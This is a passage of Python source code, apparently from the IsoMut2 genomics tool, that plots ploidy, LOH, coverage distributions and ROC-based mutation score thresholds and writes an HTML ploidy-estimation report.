Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n all_chrom_figfiles = []\n for c in chromosomes:\n if not __os.path.isfile(output_dir + '/PE_fullchrom_' + c + '.txt'):\n raise ValueError(\n 'File ' + output_dir + '/PE_fullchrom_' + c + '.txt is not yet created, call \"run_ploidy_estimation\" first.')\n df = __pd.read_csv(output_dir + '/PE_fullchrom_' + c + '.txt', sep='\\t')\n df = df[['chrom', 'pos', 'cov', 'mut_freq', 'ploidy', 'LOH']]\n if (return_string):\n all_chrom_figfiles.append(plot_karyotype_for_chrom(chrom=c, df=df, return_string=True))\n else:\n all_chrom_figfiles.append(plot_karyotype_for_chrom(chrom=c, df=df, return_string=False))\n return all_chrom_figfiles\n\n\ndef __get_BAF_and_DR(avg_dip_cov, chroms, chrom_length_list, datadir,\n binsize=1000000,\n overlap=50000,\n cov_min=5,\n cov_max=200):\n \"\"\"\n\n Calculates depth ratio means, 25th and 75th percentiles in windows of genomic positions with a moving average method.\n Calculates B-allele frequency means, 25th and 75th percentiles in windows of genomic positions with a moving average method.\n\n :param avg_dip_cov: average coverage of diploid regions (float)\n :param chroms: list of chromosomes of the genome (list of str)\n :param chrom_length_list: list of chromosome lengths in basepairs (list of int)\n :param datadir: the path to the directory where PE_fullchrom_[chrom].txt files are stored\n :param binsize: the binsize used for moving average (default: 1000000) (int)\n :param overlap: the overlap used for moving average (default: 50000) (int, smaller than binsize)\n :param cov_min: the minimum coverage for a position to be included (default: 5) (int)\n :param cov_max: the maximum coverage for a position to be included (default: 200) (int)\n\n :returns: (real_pos, dr, dr_25, dr_75, baf, baf_25, baf_75)\n\n - real_pos: list of real genomic positions (int in range (1-genome_length))\n - dr: list of average depth ratios in the neighborhood of the above positions\n - dr_25: list of 25th percentiles of depth ratios in the neighborhood of the above positions\n - dr_75: list of 75th percentiles of depth ratios in the neighborhood of the above positions\n - baf: list of average B-allele frequencies in the neighborhood of the above positions\n - baf_25: list of 25th percentiles of B-allele frequencies in the neighborhood of the above positions\n - baf_75: list of 75th percentiles of B-allele frequencies in the neighborhood of the above positions\n\n \"\"\"\n\n real_pos, dr, dr_25, dr_75, baf, baf_25, baf_75 = [[] for i in range(7)]\n\n for c in chroms:\n posbase = sum(chrom_length_list[:chroms.index(c)])\n tmp = __pd.read_csv(datadir + '/PE_fullchrom_' + c + '.txt', sep='\\t')\n tmp = tmp[(tmp['cov'] >= cov_min) & (tmp['cov'] <= cov_max)]\n\n posstart = tmp['pos'].min()\n posmax = tmp['pos'].max()\n while posstart < posmax:\n if tmp[(tmp['pos'] >= posstart) & (tmp['pos'] < posstart + binsize)].shape[0] > 0:\n bafs = __np.array(list(tmp[(tmp['pos'] >= posstart) & (tmp['pos'] < posstart + binsize)]['mut_freq']))\n if len(bafs[bafs >= 0.5]) > 0:\n real_pos.append(int(posstart + binsize / 2) + posbase)\n bafs = 1 - bafs[bafs >= 0.5]\n baf.append(__np.mean(bafs))\n baf_25.append(__np.percentile(bafs, 25))\n baf_75.append(__np.percentile(bafs, 75))\n covs = __np.array(list(tmp[(tmp['pos'] >= posstart) & (tmp['pos'] < posstart + binsize)]['cov']))\n dr.append(__np.mean(covs / avg_dip_cov))\n dr_25.append(__np.percentile(covs / avg_dip_cov, 25))\n dr_75.append(__np.percentile(covs / avg_dip_cov, 75))\n if posstart + binsize > posmax:\n break\n 
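# advance the window start by (binsize - overlap) bp, so consecutive bins share 'overlap' bp\n 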
posstart += (binsize - overlap)\n\n return real_pos, dr, dr_25, dr_75, baf, baf_25, baf_75\n\n\ndef __get_PL_and_LOH(bed_filename,\n chroms,\n chrom_lenght_list,\n bed_file_sep=',',\n numtoplot=10000,\n minlength=3000000):\n \"\"\"\n\n From a bed file of ploidies and LOH regions, generates a list of numtoplot positions with respective ploidies and LOHs.\n\n :param bed_filename: path to the bed file of the sample containing ploidy and LOH information (str)\n :param chroms: list of chromosomes in the genome (list of str)\n :param chrom_lenght_list: list of chromosome lengths in basepairs (list of int)\n :param bed_file_sep: bed file separator (default: \",\") (str)\n :param numtoplot: the number of measurement points (default: 10000) (int)\n :param minlength: the minimal length of a region to be plotted (default: 3000000) (int)\n\n :returns: (toplot_pos, toplot_pl, toplot_pos_loh, toplot_loh)\n\n - toplot_pos: genomic positions in which ploidy should be plotted\n - toplot_pl: the ploidy in these positions\n - toplot_pos_loh: genomic positions in which LOHs should be plotted\n - toplot_loh: the LOH in these positions\n\n \"\"\"\n\n toplot_pos = __np.arange(numtoplot) * int(sum(chrom_lenght_list) / numtoplot)\n toplot_pl = __np.zeros(numtoplot)\n toplot_loh = __np.zeros(numtoplot)\n\n pl_res = __pd.read_csv(bed_filename, sep=bed_file_sep)\n\n cs_list, ce_list, p_list, l_list = [[] for i in range(4)]\n\n for c, cs, ce, p, l in zip(list(pl_res['chrom']), list(pl_res['chromStart']), list(pl_res['chromEnd']),\n list(pl_res['ploidy']), list(pl_res['LOH'])):\n if ce - cs > minlength:\n cs_list.append(cs + sum(chrom_lenght_list[:chroms.index(c)]))\n ce_list.append(ce + sum(chrom_lenght_list[:chroms.index(c)]))\n p_list.append(p)\n l_list.append(l)\n for i in range(len(cs_list) - 1):\n if ce_list[i] + 1 < cs_list[i + 1]:\n bp = int(__np.mean([ce_list[i], cs_list[i + 1]]))\n ce_list[i] = bp\n cs_list[i + 1] = bp + 1\n for j in range(numtoplot):\n if toplot_pos[j] >= cs_list[i] and toplot_pos[j] < ce_list[i]:\n toplot_pl[j] = p_list[i]\n toplot_loh[j] = l_list[i]\n toplot_pos_loh = toplot_pos[toplot_loh == 1]\n toplot_loh = __np.ones(len(toplot_pos_loh))\n\n return toplot_pos, toplot_pl, toplot_pos_loh, toplot_loh\n\n\ndef __plot_karyotype(real_pos, dr, dr_25, dr_75, baf, baf_25, baf_75, s0, s1, loh_pos, loh,\n all_chroms,\n chrom_length_list,\n chroms_with_text=None):\n \"\"\"\n\n Plots a karyotype summary for the whole genome.\n\n :param real_pos: list of real genomic positions (int in range (1-genome_length))\n :param dr: list of average depth ratios in the neighborhood of the above positions\n :param dr_25: list of 25th percentiles of depth ratios in the neighborhood of the above positions\n :param dr_75: list of 75th percentiles of depth ratios in the neighborhood of the above positions\n :param baf: list of average B-allele frequencies in the neighborhood of the above positions\n :param baf_25: list of 25th percentiles of B-allele frequencies in the neighborhood of the above positions\n :param baf_75: list of 75th percentiles of B-allele frequencies in the neighborhood of the above positions\n :param s0: list of genomic positions in which to plot ploidy information\n :param s1: ploidies in these positions\n :param loh_pos: list of genomic positions in which to plot LOH information\n :param loh: list of LOH values in these positions\n :param all_chroms: list of all chromosomes in the genome (list of str)\n :param chrom_length_list: list of chromosome lengths (list of int)\n :param chroms_with_text: 
the list of chromosomes to be indicated with text on the plot (list of str) (If there are many short chromosomes or they have long names, it is useful to only indicate a few with text on the plot.)\n\n :returns: a matplotlib figure\n\n \"\"\"\n\n if chroms_with_text is None:\n chroms_with_text = all_chroms\n\n try:\n __sns.set(style=\"white\", font=\"DejaVu Sans\")\n except:\n pass\n\n fig, axes = __plt.subplots(nrows=2, sharex=True)\n fig.set_size_inches(18 / 2.5, 9 / 2.5)\n fig.subplots_adjust(top=0.92, left=0.07, right=0.97, hspace=0.2)\n\n ax_dr, ax_baf = axes\n ax_pl1 = ax_dr.twinx()\n ax_pl2 = ax_baf.twinx()\n\n idx = __np.random.choice(__np.arange(len(real_pos)), size=int(__np.min([5000, len(real_pos)])), replace=False)\n\n # plotting depth ratios\n\n error = [__np.array(dr_25)[idx], __np.array(dr_75)[idx]]\n ax_dr.errorbar(__np.array(real_pos)[idx], __np.array(dr)[idx], yerr=error, fmt='o', ecolor='#E6E6FA',\n markeredgecolor='black', markerfacecolor='black', ms=2, capsize=0)\n ax_pl1.scatter(s0, s1, edgecolor='red', facecolor='red', s=3)\n ax_dr.set_ylabel('Depth ratio\\n', size=10)\n ax_pl1.set_ylabel('\\n\\nEstimated ploidy', size=10)\n ax_dr.set_ylim([-0.25, 2.75])\n ax_pl1.set_ylim([-0.5, 5.5])\n ax_dr.set_yticks([0, 0.5, 1, 1.5, 2, 2.5])\n ax_pl1.set_yticks([0, 1, 2, 3, 4, 5])\n ax_dr.tick_params(axis='x', size=0)\n ax_pl1.tick_params(axis='x', size=0)\n\n # plotting chrom borders\n\n for c in all_chroms:\n ax_dr.plot([sum(chrom_length_list[:all_chroms.index(c)]), sum(chrom_length_list[:all_chroms.index(c)])],\n [-0.25, 2.75], lw=1.5, c='#9C9C9C')\n ax_baf.plot([sum(chrom_length_list[:all_chroms.index(c)]), sum(chrom_length_list[:all_chroms.index(c)])],\n [-0.05, 0.55], lw=1.5, c='#9C9C9C')\n for c in chroms_with_text:\n ax_dr.text(sum(chrom_length_list[:all_chroms.index(c)]) + 0.5 * chrom_length_list[all_chroms.index(c)], -0.65,\n c, fontsize=6, color='#8F8F8F', horizontalalignment='center')\n\n # plotting bafs\n\n error = [__np.array(baf_25)[idx], __np.array(baf_75)[idx]]\n ax_baf.errorbar(__np.array(real_pos)[idx], __np.array(baf)[idx], yerr=error, fmt='o', ecolor='#E6E6FA',\n markeredgecolor='black', markerfacecolor='black', ms=2, capsize=0)\n ax_pl2.scatter(s0, 1 / __np.array(s1) * (__np.array(s1) != 1), edgecolor='red', facecolor='red', s=3)\n if len(loh_pos) > 0:\n ax_pl2.scatter(loh_pos, loh * (-0.15), edgecolor='orange', facecolor='orange', s=1.5, clip_on=False)\n ax_pl2.text(-0.085, -0.14, 'LOH',\n verticalalignment='center', horizontalalignment='center',\n transform=ax_pl2.transAxes, fontsize=10, rotation=90)\n\n ax_baf.set_ylabel('BAF\\n', size=10)\n ax_pl2.set_ylabel('\\n1/Estimated ploidy', size=10)\n ax_baf.set_ylim([-0.05, 0.55])\n ax_baf.set_xlim([0, max(real_pos)])\n ax_pl2.set_ylim([-0.05, 0.55])\n ax_baf.set_yticks([0, 0.1, 0.2, 0.3, 0.4, 0.5])\n ax_pl2.set_yticks([0, 0.1, 0.2, 0.3, 0.4, 0.5])\n ax_pl2.tick_params(axis='x', size=0)\n ax_baf.tick_params(axis='x', size=0)\n ax_baf.set_xticklabels(size=0, labels=[1, 2, 3])\n ax_pl2.set_xticklabels(size=0, labels=[1, 2, 3])\n\n # plotting fig\n __plt.show()\n return fig\n\n\ndef plot_karyotype_summary(haploid_coverage,\n chromosomes,\n chrom_length,\n output_dir,\n bed_filename,\n bed_file_sep=',',\n binsize=1000000,\n overlap=50000,\n cov_min=5,\n cov_max=200,\n min_PL_length=3000000,\n chroms_with_text=None):\n \"\"\"\n\n Plots karyotype summary for the whole genome with data preparation.\n\n :param haploid_coverage: the average coverage of haploid regions (or the half of that of diploid regions)\n :param 
chromosomes: list of chromosomes in the genome (list of str)\n :param chrom_length: list of chromosome lengths (list of int)\n :param output_dir: the path to the directory where PE_fullchrom_[chrom].txt files are located (str)\n :param bed_filename: the path to the bed file of the sample with ploidy and LOH information (str)\n :param bed_file_sep: bed file separator (default: ',') (str)\n :param binsize: the binsize used for moving average (default: 1000000) (int)\n :param overlap: the overlap used for moving average (default: 50000) (int, smaller than binsize)\n :param cov_min: the minimum coverage for a position to be included (default: 5) (int)\n :param cov_max: the maximum coverage for a position to be included (default: 200) (int)\n :param min_PL_length: the minimal length of a region to be plotted (default: 3000000) (int)\n :param chroms_with_text: the list of chromosomes to be indicated with text on the plot (list of str) (If there are many short chromosomes or they have long names, it is useful to only indicate a few with text on the plot.)\n\n :returns: a matplotlib figure\n\n \"\"\"\n\n real_pos, dr, dr_25, dr_75, baf, baf_25, baf_75 = __get_BAF_and_DR(avg_dip_cov=haploid_coverage * 2,\n chroms=chromosomes,\n chrom_length_list=chrom_length,\n datadir=output_dir,\n binsize=binsize,\n overlap=overlap,\n cov_min=cov_min,\n cov_max=cov_max)\n s0, s1, loh_pos, loh = __get_PL_and_LOH(bed_filename=bed_filename,\n chroms=chromosomes,\n chrom_lenght_list=chrom_length,\n bed_file_sep=bed_file_sep,\n numtoplot=5000,\n minlength=min_PL_length)\n\n f = __plot_karyotype(real_pos=real_pos,\n dr=dr,\n dr_25=dr_25,\n dr_75=dr_75,\n baf=baf,\n baf_25=baf_25,\n baf_75=baf_75,\n s0=s0,\n s1=s1,\n loh_pos=loh_pos,\n loh=loh,\n all_chroms=chromosomes,\n chrom_length_list=chrom_length,\n chroms_with_text=chroms_with_text)\n\n return f\n\n\ndef generate_HTML_report_for_ploidy_est(chromosomes, output_dir, min_noise=__np.nan):\n \"\"\"\n\n Generates an HTML file with figures displaying the results of ploidy estimation and saves it to output_dir/PEreport.html.\n\n :param chromosomes: list of chromosomes in the genome (list of str)\n :param output_dir: the path to the directory where PE_fullchrom_[chrom].txt files are located (str)\n :param min_noise: the minimal B-allele frequency for a position to be included in the analyses (default: numpy.nan) (float)\n\n \"\"\"\n\n FIG_all_chroms = plot_karyotype_for_all_chroms(chromosomes, output_dir, return_string=True)\n\n string_for_all_chroms = ''\n for ch_figfile in FIG_all_chroms:\n string_for_all_chroms += '''<img src=\"data:image/png;base64,''' + ch_figfile.decode(\n 'utf-8') + '''\" alt=\"detailed_PEs.png\"><br>'''\n\n # generating HTML report\n\n html_string = '''\n <html>\n <style>\n @import url(https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic);\n @import url(https://fonts.googleapis.com/css?family=Open+Sans:800);\n @import url(http://fonts.googleapis.com/css?family=Lato|Source+Code+Pro|Montserrat:400,700);\n @import url(https://fonts.googleapis.com/css?family=Raleway);\n @import \"font-awesome-sprockets\";\n @import \"font-awesome\";\n\n body {\n font-family: 'Lora', 'Times New Roman', serif;\n font-size: 12pt;\n line-height: 145%;}\n\n p {\n text-align: justify;}\n\n h1,h2,h3,h4,h5,h6 {\n font-family: 'Open Sans', sans-serif;\n font-weight: 800;\n line-height: 145%;}\n\n h1 {\n font-size: 4rem;}\n h2 {\n font-size: 3.5rem;}\n\n .MathJax{\n font-size: 7pt;}\n\n img {\n text-align:center;\n display:block;}\n\n </style>\n <script 
type=\"text/javascript\" src=\"https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML\"></script>\n <script>\n MathJax.Hub.Config({\n tex2jax: {inlineMath: [['$','$']]}\n });\n </script>\n\n <head>\n <meta charset=\"utf-8\">\n </head>\n <body>\n <h2>IsoMut2 results - ploidy estimation</h2>\n <br>\n Date and time of analysis: ''' + str(__datetime.now()).split('.')[0] + ''' <br><br>\n Data stored at: <br>\n ''' + output_dir + ''' <br><br>\n <h3>Local ploidy estimates throughout the whole genome:</h3>\n Only those positions are included on the plots below, where the reference nucleotide frequency is in\n the range [''' + str(min_noise) + ''', ''' + str(1 - min_noise) + '''].\n <br><br>\n On the figures below yellow lines represent <i>coverage</i>, and purple dots the <i>reference nucleotide frequency</i> values for the above defined\n genomic positions. Black dots show the <i>inverse of the estimated copy number</i> at the given position. Grey rectangles indicate LOH (loss of\n heterozygosity) regions.\n <br><br>''' + string_for_all_chroms\n\n html_string += '''\n </body>\n </html>'''\n\n with open(output_dir + '/PEreport.html', 'w') as f:\n f.write(html_string)\n\n\ndef plot_coverage_distribution(cov_sample=None,\n chromosomes=None,\n output_dir=None,\n cov_max=None,\n cov_min=None,\n distribution_dict=None):\n \"\"\"\n\n Plot the coverage distribution of the sample.\n\n :param cov_sample: a sample of the coverage distribution (default: None) (array-like)\n :param chromosomes: the list of chromosomes in the genome (default: None) (list of str)\n :param output_dir: the path to the directory where PE_fullchrom_[chrom].txt files are located (default: None) (str)\n :param cov_max: the maximum value for the coverage for a position to be included on the plot (default: None) (int)\n :param cov_min: the minimum value for the coverage for a position to be included on the plot (default: None) (int)\n :param distribution_dict: a dictionary containing the fitted parameters of the coverage distribution (default: None) (dictionary with keys: 'mu', 'sigma', 'p')\n\n \"\"\"\n\n try:\n __sns.set(style=\"whitegrid\", font=\"DejaVu Sans\")\n except:\n pass\n\n if cov_sample is None:\n cov_sample = io.get_coverage_distribution(chromosomes=chromosomes,\n output_dir=output_dir,\n cov_max=cov_max,\n cov_min=cov_min)\n\n if distribution_dict is not None or (__os.path.isfile(output_dir + '/GaussDistParams.pkl')):\n if distribution_dict == None:\n distribution_dict = io.load_cov_distribution_parameters_from_file()\n\n range_max = distribution_dict['mu'][-1] + 3 * distribution_dict['sigma'][-1]\n colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f',\n '#bcbd22', '#17becf']\n x = __np.linspace(0, range_max, 500)\n\n for i in range(len(distribution_dict['mu'])):\n m = distribution_dict['p'][i] * __stats.norm.pdf(x, loc=distribution_dict['mu'][i],\n scale=distribution_dict['sigma'][i])\n\n plot_temp = __plt.plot(x, m, label=\"Ploidy \" + str(i + 1), lw=3, color=colors[i])\n __plt.fill_between(x, m, color=plot_temp[0].get_color(), alpha=0.3)\n __plt.xlim(0, range_max)\n\n __plt.hist(cov_sample, bins=100, histtype=\"step\", density=True, color=\"k\",\n lw=2, label=\"coverage histogram\")\n __plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., framealpha=0.0)\n\n __plt.title(\"Coverage distribution\\n\")\n __plt.xlabel('coverage')\n __plt.ylabel('relative occurence')\n f = __plt.gcf()\n __plt.show()\n __plt.close()\n\n return 
f\n\n\ndef __plot_tuning_curve(control_samples, mutation_dataframe, return_string=False, unique_samples=None):\n \"\"\"\n\n Plots tuning curves for all mutations types (SNV, INS, DEL) and all ploidies for each available sample in the MutationDetection object.\n Samples listed as control_samples are highlighted with a different color.\n\n :param control_samples: a subset of bam_filename (list of sample names) that should be considered as control samples. Control samples are defined as samples where no unique mutations are expected to be found. (list of str)\n :param mutation_dataframe: The dataframe containing the mutations. (pandas.DataFrame)\n :param unique_samples: list of unique samples where at least one mutation is detected (default: None) (list of str)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n try:\n __sns.set(style=\"whitegrid\", font=\"DejaVu Sans\")\n except:\n pass\n\n if unique_samples == None:\n unique_samples = sorted(\n list(set([item for s in list(mutation_dataframe['sample_name'].unique()) for item in s.split(', ')])))\n\n ymax_SNV = mutation_dataframe[mutation_dataframe['type'] == 'SNV'].groupby(['sample_name']).count().max()['chr']\n ymax_INS = mutation_dataframe[mutation_dataframe['type'] == 'INS'].groupby(['sample_name']).count().max()['chr']\n ymax_DEL = mutation_dataframe[mutation_dataframe['type'] == 'DEL'].groupby(['sample_name']).count().max()['chr']\n ymax = [ymax_SNV, ymax_INS, ymax_DEL]\n ymax_all = [10 ** (len(str(ym))) for ym in ymax]\n\n mut_types_all = ['SNV', 'INS', 'DEL']\n\n unique_ploidies = sorted([int(i) for i in list(mutation_dataframe['ploidy'].unique())])\n\n color_dict_base = {'control': '#008B8B',\n 'treated': '#8B008B'}\n\n color_list = [color_dict_base['control'] if s in control_samples\n else color_dict_base['treated'] for s in unique_samples]\n\n fig, axes = __plt.subplots(len(unique_ploidies), 3)\n fig.set_size_inches(21, 5 * len(unique_ploidies))\n fig.subplots_adjust(top=0.92, left=0.07, right=0.97,\n hspace=0.4, wspace=0.2)\n for m in range(len(mut_types_all)):\n if (len(unique_ploidies) == 1):\n ymax = 10 ** len(str(mutation_dataframe[(mutation_dataframe['type'] == mut_types_all[m]) & (\n mutation_dataframe['ploidy'] == unique_ploidies[0])].groupby(['sample_name']).count().max()['chr']))\n for s, c in zip(unique_samples, color_list):\n l = 'control samples' if s in control_samples else 'treated samples'\n score = mutation_dataframe[\n (mutation_dataframe['type'] == mut_types_all[m]) & (mutation_dataframe['sample_name'] == s) & (\n mutation_dataframe['ploidy'] == unique_ploidies[0])].sort_values(by='score')['score']\n axes[m].plot(score, len(score) - __np.arange(len(score)), c=c, label=l)\n axes[m].set_xlabel(r'score threshold', fontsize=12)\n axes[m].set_title(mut_types_all[m] + ' (ploidy: ' + str(unique_ploidies[0]) + ')\\n', fontsize=14)\n axes[m].set_ylabel(r'Mutations found', fontsize=12)\n axes[m].set_ylim(1, ymax)\n axes[m].set_yscale('log')\n axes[m].set_xlim(0, mutation_dataframe['score'].max())\n # axes[i][m].grid()\n handles, labels = axes[m].get_legend_handles_labels()\n labels, ids = __np.unique(labels, return_index=True)\n handles = [handles[k] for k in ids]\n axes[m].legend(handles, labels, loc='upper right', fancybox=True)\n else:\n for i in 
range(len(unique_ploidies)):\n ymax = 10 ** len(str(mutation_dataframe[(mutation_dataframe['type'] == mut_types_all[m]) & (\n mutation_dataframe['ploidy'] == unique_ploidies[i])].groupby(['sample_name']).count().max()[\n 'chr']))\n for s, c in zip(unique_samples, color_list):\n l = 'control samples' if s in control_samples else 'treated samples'\n score = mutation_dataframe[\n (mutation_dataframe['type'] == mut_types_all[m]) & (mutation_dataframe['sample_name'] == s) & (\n mutation_dataframe['ploidy'] == unique_ploidies[i])].sort_values(by='score')['score']\n axes[i][m].plot(score, len(score) - __np.arange(len(score)), c=c, label=l)\n axes[i][m].set_xlabel(r'score threshold', fontsize=12)\n axes[i][m].set_title(mut_types_all[m] + ' (ploidy: ' + str(unique_ploidies[i]) + ')\\n', fontsize=14)\n axes[i][m].set_ylabel(r'Mutations found', fontsize=12)\n axes[i][m].set_ylim(1, ymax)\n axes[i][m].set_yscale('log')\n axes[i][m].set_xlim(0, mutation_dataframe['score'].max())\n # axes[i][m].grid()\n handles, labels = axes[i][m].get_legend_handles_labels()\n labels, ids = __np.unique(labels, return_index=True)\n handles = [handles[k] for k in ids]\n axes[i][m].legend(handles, labels, loc='upper right', fancybox=True)\n\n if (not return_string):\n __plt.show()\n __plt.close()\n return fig\n else:\n figfile = __BytesIO()\n __plt.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n return figdata_png\n\n\ndef __plot_roc(mutation_dataframe, control_samples,\n FPs_per_genome, score0=0, plot_roc=True, return_string=False, unique_samples=None):\n \"\"\"\n\n Optimizes score values for different mutation types (SNV, INS, DEL) and ploidies according to the list of control samples and the desired\n level of false positives in the genome.\n The results are stored in the score_lim_dict attribute of the MutationDetection object. If plot = True, plots ROC curves for all mutations\n types (SNV, INS, DEL) and all ploidies.\n\n :param mutation_dataframe: The dataframe containing the mutations. (pandas.DataFrame)\n :param control_samples: a subset of bam_filename (list of sample names) that should be considered as control samples. Control samples are defined as samples where no unique mutations are expected to be found. (list of str)\n :param FPs_per_genome: the largest number of false positives tolerated in a control sample (int)\n :param score0: Score optimization starts with score0. If a larger score value is likely to be optimal, setting score0 to a number larger than 0 can decrease computation time. (default: 0) (float)\n :param plot_roc: If True, ROC curves are plotted, otherwise score optimization is performed without generating any figures. (default: True) (bool)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n :param unique_samples: list of unique samples where at least one mutation is detected (default: None) (list of str)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. 
Otherwise, a matplotlib figure.\n\n \"\"\"\n try:\n __sns.set(style=\"whitegrid\", font=\"DejaVu Sans\")\n except:\n pass\n\n steps = 50\n\n if unique_samples == None:\n unique_samples = sorted(\n list(set([item for s in list(mutation_dataframe['sample_name'].unique()) for item in s.split(', ')])))\n\n total_num_of_FPs_per_genome = FPs_per_genome\n\n unique_ploidies = sorted(list(mutation_dataframe['ploidy'].unique()))\n\n mut_types_all = ['SNV', 'INS', 'DEL']\n\n score_lim_dict = {'SNV': [], 'INS': [], 'DEL': []}\n\n control_idx = []\n treated_idx = []\n for i in range(len(unique_samples)):\n if (unique_samples[i] in control_samples):\n control_idx.append(i)\n else:\n treated_idx.append(i)\n\n control_idx = __np.array(control_idx)\n treated_idx = __np.array(treated_idx)\n\n if total_num_of_FPs_per_genome is not None:\n FPs_per_ploidy = dict()\n for m in mut_types_all:\n FPs_per_ploidy[m] = dict()\n for pl in unique_ploidies:\n totalmuts_per_ploidy = \\\n mutation_dataframe[(mutation_dataframe['ploidy'] == pl) & (mutation_dataframe['type'] == m)].shape[\n 0]\n totalmuts = mutation_dataframe[(mutation_dataframe['type'] == m)].shape[0]\n if (totalmuts == 0):\n FPs_per_ploidy[m][pl] = total_num_of_FPs_per_genome\n else:\n FPs_per_ploidy[m][pl] = int(\n round((float(totalmuts_per_ploidy) / totalmuts) * total_num_of_FPs_per_genome))\n\n if plot_roc:\n fig, axes = __plt.subplots(len(unique_ploidies), 3)\n fig.set_size_inches(21, 5 * len(unique_ploidies))\n fig.subplots_adjust(top=0.92, left=0.07, right=0.97,\n hspace=0.4, wspace=0.2)\n\n for m in range(len(mut_types_all)):\n if len(unique_ploidies) == 1:\n fp, tp = [0 for k in range(steps)], [0 for k in range(steps)]\n fp_real, tp_real = [0 for k in range(steps)], [0 for k in range(steps)]\n for score_lim, j in zip(\n __np.linspace(score0,\n mutation_dataframe[mutation_dataframe['type'] == mut_types_all[m]]['score'].max(),\n steps),\n range(steps)):\n muts = []\n for s in unique_samples:\n muts.append(mutation_dataframe[(mutation_dataframe['ploidy'] == unique_ploidies[0]) &\n (mutation_dataframe['sample_name'] == s) &\n (mutation_dataframe['score'] > score_lim) &\n (mutation_dataframe['type'] == mut_types_all[m])].shape[0])\n muts = __np.array(muts)\n fp[j], tp[j] = 1e-6 * __np.max(muts[control_idx]), 1e-6 * __np.mean(muts[treated_idx])\n fp_real[j], tp_real[j] = __np.max(muts[control_idx]), __np.mean(muts[treated_idx])\n if (plot_roc):\n axes[m].step(fp, tp, c='#DB7093', lw=3)\n axes[m].set_title(mut_types_all[m] + ' (ploidy: ' + str(int(unique_ploidies[0])) + ')\\n',\n fontsize=14)\n\n if (total_num_of_FPs_per_genome is not None):\n fp_real = __np.array(fp_real)\n tp_real = __np.array(tp_real)\n if (len(tp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[0]]]) > 0):\n tps = tp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[0]]][0]\n fps = fp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[0]]][0]\n score_lim = \\\n __np.linspace(score0,\n mutation_dataframe[mutation_dataframe['type'] == mut_types_all[m]]['score'].max(),\n steps)[\n fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[0]]][0]\n if (plot_roc):\n axes[m].plot(fps * 1e-6, tps * 1e-6, 'o', mec='#C71585', mfc='#C71585', ms=15, mew=3,\n label='score limit: ' + str(score_lim))\n axes[m].text(0.95, 0.06, 'score limit: ' + str(score_lim),\n bbox={'facecolor': 'white', 'pad': 10}, verticalalignment='bottom',\n horizontalalignment='right', transform=axes[m].transAxes)\n else:\n score_lim = 10000\n if (plot_roc):\n 
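# no score threshold keeps false positives within the allowed budget, so the score limit is reported as infinite\n 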
axes[m].text(0.95, 0.06, 'score limit: inf',\n bbox={'facecolor': 'white', 'pad': 10}, verticalalignment='bottom',\n horizontalalignment='right', transform=axes[m].transAxes)\n score_lim_dict[mut_types_all[m]].append(score_lim)\n if (plot_roc):\n axes[m].set_ylim(bottom=0)\n axes[m].set_xlim(left=0)\n axes[m].ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))\n axes[m].ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))\n axes[m].set_xlabel('false positive rate 1/Mbp ', fontsize=12)\n axes[m].set_ylabel('mutation rate 1/Mbp ', fontsize=12)\n\n else:\n for i in range(len(unique_ploidies)):\n fp, tp = [0 for k in range(steps)], [0 for k in range(steps)]\n fp_real, tp_real = [0 for k in range(steps)], [0 for k in range(steps)]\n for score_lim, j in zip(\n __np.linspace(score0,\n mutation_dataframe[mutation_dataframe['type'] == mut_types_all[m]]['score'].max(),\n steps),\n range(steps)):\n muts = []\n for s in unique_samples:\n muts.append(mutation_dataframe[(mutation_dataframe['ploidy'] == unique_ploidies[i]) &\n (mutation_dataframe['sample_name'] == s) &\n (mutation_dataframe['score'] > score_lim) &\n (mutation_dataframe['type'] == mut_types_all[m])].shape[0])\n muts = __np.array(muts)\n fp[j], tp[j] = 1e-6 * __np.max(muts[control_idx]), 1e-6 * __np.mean(muts[treated_idx])\n fp_real[j], tp_real[j] = __np.max(muts[control_idx]), __np.mean(muts[treated_idx])\n if plot_roc:\n axes[i][m].step(fp, tp, c='#DB7093', lw=3)\n axes[i][m].set_title(mut_types_all[m] + ' (ploidy: ' + str(int(unique_ploidies[i])) + ')\\n',\n fontsize=14)\n\n if total_num_of_FPs_per_genome is not None:\n fp_real = __np.array(fp_real)\n tp_real = __np.array(tp_real)\n if (len(tp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[i]]]) > 0):\n tps = tp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[i]]][0]\n fps = fp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[i]]][0]\n score_lim = \\\n __np.linspace(score0, mutation_dataframe[mutation_dataframe['type'] == mut_types_all[m]][\n 'score'].max(), steps)[\n fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[i]]][0]\n if (plot_roc):\n axes[i][m].plot(fps * 1e-6, tps * 1e-6, 'o', mec='#C71585', mfc='#C71585', ms=15, mew=3,\n label='score limit: ' + str(score_lim))\n axes[i][m].text(0.95, 0.06, 'score limit: ' + str(score_lim),\n bbox={'facecolor': 'white', 'pad': 10}, verticalalignment='bottom',\n horizontalalignment='right', transform=axes[i][m].transAxes)\n else:\n score_lim = 10000\n if (plot_roc):\n axes[i][m].text(0.95, 0.06, 'score limit: inf',\n bbox={'facecolor': 'white', 'pad': 10}, verticalalignment='bottom',\n horizontalalignment='right', 